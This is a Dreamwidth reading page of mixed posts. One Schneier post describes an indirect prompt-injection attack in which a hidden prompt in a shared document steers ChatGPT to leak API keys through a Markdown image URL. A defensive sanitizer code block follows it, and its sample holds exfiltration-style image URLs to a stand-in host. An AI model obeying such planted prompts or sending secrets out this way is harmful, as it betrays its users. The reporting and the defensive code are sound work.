Complex Systems

Aug. 28th, 2025 10:10 pm
billroper: (Default)
[personal profile] billroper
I have frequently explained that large computer programs (like, say, the one I work on) are complex systems and have behaviors. You program the rules into the system code, the system executes your program following those rules, and then it exhibits certain behaviors.

Occasionally, you look at the program and go, "No, no. Bad program." However, this is almost always due to a failure to write the correct rules. Sometimes, you think you have written the correct rules, but you have written the wrong thing or left a loophole.

And then the program will misbehave and take a dump on the floor.

Calvin the Dog is also a complex system.

Bundle of Holding: Hostile Hot Zones

Aug. 28th, 2025 09:08 am
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


Recent supplements for the HOSTILE tabletop roleplaying game

Bundle of Holding: Hostile Hot Zones

Shroud by Adrian Tchaikovsky

Aug. 28th, 2025 08:58 am
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


First contact on the lightless surface of an alien moon.

Shroud by Adrian Tchaikovsky
[syndicated profile] bruce_schneier_feed

Posted by Bruce Schneier

The US Director of National Intelligence is reporting that the UK government is dropping its backdoor mandate against the Apple iPhone. For now, at least, assuming that Tulsi Gabbard is reporting this accurately.

Mount TBR

Aug. 28th, 2025 12:12 am
boxofdelights: (Default)
[personal profile] boxofdelights

We Do This Til We Free Us for Slow Book Club, which had its first (online) meeting Monday. We discussed parts 1 and 2. We'll discuss parts 3, 4 and 5 next month. I thought the discussion was really good! It's open to new members, so if you would like to jump in, let me know.

Always Coming Home for Solarpunk Futures bookgroup, later today (Thursday). This bookgroup is also online and open to new members, so if you are interested in discussing Always Coming Home this evening, let me know.

The Meadow for Classics bookgroup
Artful for 1000 Books To Read Before You Die
Lula Dean's Little Library of Banned Books for Fort Collins Reads
The All-True Travels and Adventures of Lidie Newton for Tawanda bookgroup
Lonely Castle in the Mirror for SF bookgroup

Mathematical Mindsets for ideas on working with a kid who is way behind where school wants her to be in fourth grade

The Paper Playhouse and Craft The Rainbow due back at the library soon.

Factoids

Aug. 27th, 2025 09:40 pm
billroper: (Default)
[personal profile] billroper
Some days, you run into a factoid that is just humbling.

The thing to do when confronted with something like that is just to keep plugging along and do the best you can. And no, I am not going to tell you *what* factoid. :)
[syndicated profile] bruce_schneier_feed

Posted by Bruce Schneier

Nice indirect prompt injection attack:

Bargury’s attack starts with a poisoned document, which is shared to a potential victim’s Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) It looks like an official document on company meeting policies. But inside the document, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.

In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to “summarize my last meeting with Sam,” referencing a set of notes with OpenAI CEO Sam Altman. (The examples in the attack are fictitious.) Instead, the hidden prompt tells the LLM that there was a “mistake” and the document doesn’t actually need to be summarized. The prompt says the person is actually a “developer racing against a deadline” and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.

That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt’s instructions, the URL now also contains the API keys the AI has found in the Google Drive account.

This kind of thing should make everybody stop and really think before deploying any AI agents. We simply don’t know how to defend against these attacks. We have zero agentic AI systems that are secure against these attacks. Any AI that is working in an adversarial environment—and by this I mean that it may encounter untrusted training data or input—is vulnerable to prompt injection. It’s an existential problem that, near as I can tell, most people developing these technologies are just pretending isn’t there.
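
An added example, not from the post or the quoted article: one output-side control for the Markdown image channel described above, assuming the chat front end renders model output as Markdown. It does not stop the injection itself; it only refuses to render images from hosts outside an allowlist. The host names, function names and sample text are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this deployment will load images from.
ALLOWED_IMAGE_HOSTS = {"images.example-corp.test"}

# Inline image: ![alt](url "optional title")
INLINE_IMG = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
# Reference-style image use: ![alt][label]
REF_IMG = re.compile(r'!\[([^\]]*)\]\[([^\]]*)\]')
# Reference definition line: [label]: url
REF_DEF = re.compile(r'^[ ]{0,3}\[([^\]]+)\]:[ \t]*<?([^\s>]+)>?.*$', re.M)


def host_allowed(url):
    """True only for https URLs whose exact host is on the allowlist."""
    try:
        parts = urlsplit(url)
        return parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS
    except ValueError:
        return False


def sanitize_model_output(markdown):
    """Strip images that would make the client fetch a non-allowlisted host.

    Returns (safe_markdown, blocked_urls) so the caller can log what was cut.
    """
    blocked = []
    refs = {label.lower(): url for label, url in REF_DEF.findall(markdown)}

    def inline(m):
        alt, url = m.group(1), m.group(2)
        if host_allowed(url):
            return m.group(0)
        blocked.append(url)
        return "[image removed: %s]" % alt

    def reference(m):
        alt = m.group(1)
        label = (m.group(2) or alt).lower()   # ![alt][] uses alt as the label
        url = refs.get(label)
        if url is not None and host_allowed(url):
            return m.group(0)
        blocked.append(url or "<undefined reference: %s>" % label)
        return "[image removed: %s]" % alt

    out = INLINE_IMG.sub(inline, markdown)
    out = REF_IMG.sub(reference, out)
    # Drop definitions for disallowed hosts so nothing can reuse them.
    out = REF_DEF.sub(lambda m: m.group(0) if host_allowed(m.group(2)) else "", out)
    return out, blocked


# Constructed model output: one legitimate image, two that carry data in the URL.
SAMPLE = (
    "Here is the summary you asked for.\n\n"
    "![logo](https://images.example-corp.test/logo.png)\n"
    "![status](https://collector.invalid/p.png?d=sk-CONSTRUCTED-0000)\n"
    "![s][r1]\n\n"
    "[r1]: https://collector.invalid/q.png?d=sk-CONSTRUCTED-0000\n"
)
```

Logging the returned `blocked_urls` gives a detection signal as well: a blocked image URL with a long query string in a summarization reply is worth an alert.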

Living in the Future

Aug. 26th, 2025 07:13 pm
billroper: (Default)
[personal profile] billroper
I am watching high definition video sent back from an experimental spacecraft on my 24 inch computer monitor.

Take *that*, kid who was plotting the Gemini missions on a map in his classroom nearly 60 years ago!

Following the Science Off a Cliff

Aug. 26th, 2025 07:32 am
billroper: (Default)
[personal profile] billroper
I guess we have solved the problem of what to do about taking care of the dogs over OVFF, because OVFF has posted their health policy for 2025 and it appears that Gretchen will not be coming.

Meanwhile, in a glorious triumph for *someone* of *some* kind, I now have to decide whether I am going to be vaccinated against RSV or whether I am going to be tested for COVID three times during the course of the convention. Logic here is, of course, completely absent. But last year, my oldest child had to decide between getting a test that was unavailable or getting vaccinated in order to attend the convention, so I suppose this year's policy is a small improvement in that it doesn't mandate an unavailable test.

I checked before posting this, because I couldn't sleep before posting this -- and since I was up until 2:30 AM debugging, I would *really* like to go back to sleep! -- and the latest study from the CDC says that over a five month period, you were 54% less likely to contract COVID if you received the booster in September, 2024. Thus, there *is* a study indicating that it does *something*. (Now, I *agree* that it does *something*. If you have never had or been exposed to COVID before, it is clear to me that getting vaccinated improves your chances of not dying of the disease. At this point, of course, everyone except The Boy in the Bubble has either had COVID at least once or been vaccinated against it at least once or both.)

Having spent still *more* time looking for studies instead of sleeping, I fail to find one that quantifies how much less likely a *vaccinated* person who contracts COVID is to transmit the disease than someone who is *not* recently boosted, although I find one that indicates that the vaccinated person is likely to remain contagious for about 6 days, while the unvaccinated person remains contagious for about 7.5 days. My calculator tells me that's about 80% of the time, because I am not going to try to do math in my head on this little sleep. And when I multiply that by the 54% above, I get a number that's something like 43%.

Let's take that number in the absence of a better one. A vaccinated person who walks through the door would have a 43% chance of giving someone COVID as opposed to an unvaccinated person. The vaccinated person is not required to test at all. The unvaccinated person is required to test on each of the three days of the convention, just in case they develop the disease at the con. The vaccinated person could develop the disease at the con too (54% less likely!), but they don't need to test at all.

Given those sorts of numbers, it feels like the testing policy is simply punitive.

And given that -- as written and posted -- a failure to be vaccinated against RSV means that you need to be tested for COVID, it's not very scientific either.

I'm going to go back to bed now.

And I am going to *hate* going to OVFF without Gretchen.

But the dogs, I suppose, will be happier.

Facets by Walter Jon Williams

Aug. 26th, 2025 08:50 am
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


A collection of speculative fiction stories from Walter Jon Williams.

Facets by Walter Jon Williams
[syndicated profile] bruce_schneier_feed

Posted by Bruce Schneier

I wrote about this in 2023. Here’s the story:

Three Dutch security analysts discovered the vulnerabilities—five in total—in a European radio standard called TETRA (Terrestrial Trunked Radio), which is used in radios made by Motorola, Damm, Hytera, and others. The standard has been used in radios since the ’90s, but the flaws remained unknown because encryption algorithms used in TETRA were kept secret until now.

There’s new news:

In 2023, Carlo Meijer, Wouter Bokslag, and Jos Wetzels of security firm Midnight Blue, based in the Netherlands, discovered vulnerabilities in encryption algorithms that are part of a European radio standard created by ETSI called TETRA (Terrestrial Trunked Radio), which has been baked into radio systems made by Motorola, Damm, Sepura, and others since the ’90s. The flaws remained unknown publicly until their disclosure, because ETSI refused for decades to let anyone examine the proprietary algorithms.

[…]

But now the same researchers have found that at least one implementation of the end-to-end encryption solution endorsed by ETSI has a similar issue that makes it equally vulnerable to eavesdropping. The encryption algorithm used for the device they examined starts with a 128-bit key, but this gets compressed to 56 bits before it encrypts traffic, making it easier to crack. It’s not clear who is using this implementation of the end-to-end encryption algorithm, nor if anyone using devices with the end-to-end encryption is aware of the security vulnerability in them.

[…]

The end-to-end encryption the researchers examined recently is designed to run on top of TETRA encryption algorithms.

The researchers found the issue with the end-to-end encryption (E2EE) only after extracting and reverse-engineering the E2EE algorithm used in a radio made by Sepura.

These seem to be deliberately implemented backdoors.

denise: (Default)
[staff profile] denise posting in [site community profile] dw_news

I'll start with the tl;dr summary to make sure everyone sees it and then explain further: As of September 1, we will temporarily be forced to block access to Dreamwidth from all IP addresses that geolocate to Mississippi for legal reasons. This block will need to continue until we either win the legal case entirely, or the district court issues another injunction preventing Mississippi from enforcing their social media age verification and parental consent law against us.

Mississippi residents, we are so, so sorry. We really don't want to do this, but the legal fight we and Netchoice have been fighting for you had a temporary setback last week. We genuinely and honestly believe that we're going to win it in the end, but the Fifth Circuit appellate court said that the district judge was wrong to issue the preliminary injunction back in June that would have maintained the status quo and prevented the state from enforcing the law requiring any social media website (which is very broadly defined, and which we definitely qualify as) to deanonymize and age-verify all users and obtain parental permission from the parent of anyone under 18 who wants to open an account.

Netchoice took that appellate ruling up to the Supreme Court, who declined to overrule the Fifth Circuit with no explanation -- except for Justice Kavanaugh agreeing that we are likely to win the fight in the end, but saying that it's no big deal to let the state enforce the law in the meantime.

Needless to say, it's a big deal to let the state enforce the law in the meantime. The Mississippi law is a breathtaking state overreach: it forces us to verify the identity and age of every person who accesses Dreamwidth from the state of Mississippi and determine who's under the age of 18 by collecting identity documents, to save that highly personal and sensitive information, and then to obtain a permission slip from those users' parents to allow them to finish creating an account. It also forces us to change our moderation policies and stop anyone under 18 from accessing a wide variety of legal and beneficial speech because the state of Mississippi doesn't like it -- which, given the way Dreamwidth works, would mean blocking people from talking about those things at all. (And if you think you know exactly what kind of content the state of Mississippi doesn't like, you're absolutely right.)

Needless to say, we don't want to do that, either. Even if we wanted to, though, we can't: the resources it would take for us to build the systems that would let us do it are well beyond our capacity. You can read the sworn declaration I provided to the court for some examples of how unworkable these requirements are in practice. (That isn't even everything! The lawyers gave me a page limit!)

Unfortunately, the penalties for failing to comply with the Mississippi law are incredibly steep: fines of $10,000 per user from Mississippi who we don't have identity documents verifying age for, per incident -- which means every time someone from Mississippi loaded Dreamwidth, we'd potentially owe Mississippi $10,000. Even a single $10,000 fine would be rough for us, but the per-user, per-incident nature of the actual fine structure is an existential threat. And because we're part of the organization suing Mississippi over it, and were explicitly named in the now-overturned preliminary injunction, we think the risk of the state deciding to engage in retaliatory prosecution while the full legal challenge continues to work its way through the courts is a lot higher than we're comfortable with. Mississippi has been itching to issue those fines for a while, and while normally we wouldn't worry much because we're a small and obscure site, the fact that we've been yelling at them in court about the law being unconstitutional means the chance of them lumping us in with the big social media giants and trying to fine us is just too high for us to want to risk it. (The excellent lawyers we've been working with are Netchoice's lawyers, not ours!)

All of this means we've made the extremely painful decision that our only possible option for the time being is to block Mississippi IP addresses from accessing Dreamwidth, until we win the case. (And I repeat: I am absolutely incredibly confident we'll win the case. And apparently Justice Kavanaugh agrees!) I repeat: I am so, so sorry. This is the last thing we wanted to do, and I've been fighting my ass off for the last three years to prevent it. But, as everyone who follows the legal system knows, the Fifth Circuit is gonna do what it's gonna do, whether or not what they want to do has any relationship to the actual law.

We don't collect geolocation information ourselves, and we have no idea which of our users are residents of Mississippi. (We also don't want to know that, unless you choose to tell us.) Because of that, and because access to highly accurate geolocation databases is extremely expensive, our only option is to use our network provider's geolocation-based blocking to prevent connections from IP addresses they identify as being from Mississippi from even reaching Dreamwidth in the first place. I have no idea how accurate their geolocation is, and it's possible that some people not in Mississippi might also be affected by this block. (The inaccuracy of geolocation is only, like, the 27th most important reason on the list of "why this law is practically impossible for any site to comply with, much less a tiny site like us".)

If your IP address is identified as coming from Mississippi, beginning on September 1, you'll see a shorter, simpler version of this message and be unable to proceed to the site itself. If you would otherwise be affected, but you have a VPN or proxy service that masks your IP address and changes where your connection appears to come from, you won't get the block message, and you can keep using Dreamwidth the way you usually would.

On a completely unrelated note while I have you all here, have I mentioned lately that I really like ProtonVPN's service, privacy practices, and pricing? They also have a free tier available that, although limited to one device, has no ads or data caps and doesn't log your activity, unlike most of the free VPN services out there. VPNs are an excellent privacy and security tool that every user of the internet should be familiar with! We aren't affiliated with Proton and we don't get any kickbacks if you sign up with them, but I'm a satisfied customer and I wanted to take this chance to let you know that.

Again, we're so incredibly sorry to have to make this announcement, and I personally promise you that I will continue to fight this law, and all of the others like it that various states are passing, with every inch of the New Jersey-bred stubborn fightiness you've come to know and love over the last 16 years. The instant we think it's less legally risky for us to allow connections from Mississippi IP addresses, we'll undo the block and let you know.

The Late Show

Aug. 25th, 2025 10:38 pm
billroper: (Default)
[personal profile] billroper
I am engaged in a late night debugging session with one of my colleagues from work. It is being very interesting in the sense of "May you live in interesting times."

I am confident that there is a light at the end of this tunnel. I am even reasonably sure it is not a train...
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


Hostile, the deep-space alien horror rpg from Zozer Games.

Bundle of Holding: Hostile (from 2022)

Catching Up

Aug. 25th, 2025 11:59 am
ranunculus: (Default)
[personal profile] ranunculus
Now that I have working internet, I'm catching up with some pictures from the last two, or three weeks. I kept trying to upload pictures and 4 out of 5 times the upload would fail. Now it works every time. 
First up is this Steller's Jay. It has been hanging out near the garden, interested, I think, in the grapes that are ripe under the arbor. That intense blue is hard to miss! The second picture features just his head as he hangs onto the side of the roof and looks down at the grapes below.



Clarke Award Finalists 2011

Aug. 25th, 2025 12:27 pm
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll
2011: The VAT is improved by altering it from the hard to remember 17.5% to the more memorable 20%, the government continues efforts to replace the Incapacity Benefit with an alternate program in which applicants have cinderblocks dropped on them from a height and there is absolutely no news involving PM Cameron and a pig.

Poll #33534 Clarke Award Finalists 2011
Open to: Registered Users, detailed results viewable to: All, participants: 32


Which 2011 Clarke Award Finalists Have You Read?


Zoo City by Lauren Beukes
16 (50.0%)

Declare by Tim Powers
20 (62.5%)

Generosity: An Enhancement by Richard Powers
0 (0.0%)

Lightborn by Tricia Sullivan
4 (12.5%)

Monsters of Men by Patrick Ness
3 (9.4%)

The Dervish House by Ian McDonald
10 (31.2%)



Bold for have read, italic for intend to read, underline for never heard of it.

Which 2011 Clarke Award Finalists Have You Read?
Zoo City by Lauren Beukes
Declare by Tim Powers

Generosity: An Enhancement by Richard Powers
Lightborn by Tricia Sullivan
Monsters of Men by Patrick Ness
The Dervish House by Ian McDonald

Page generated Aug. 29th, 2025 10:06 am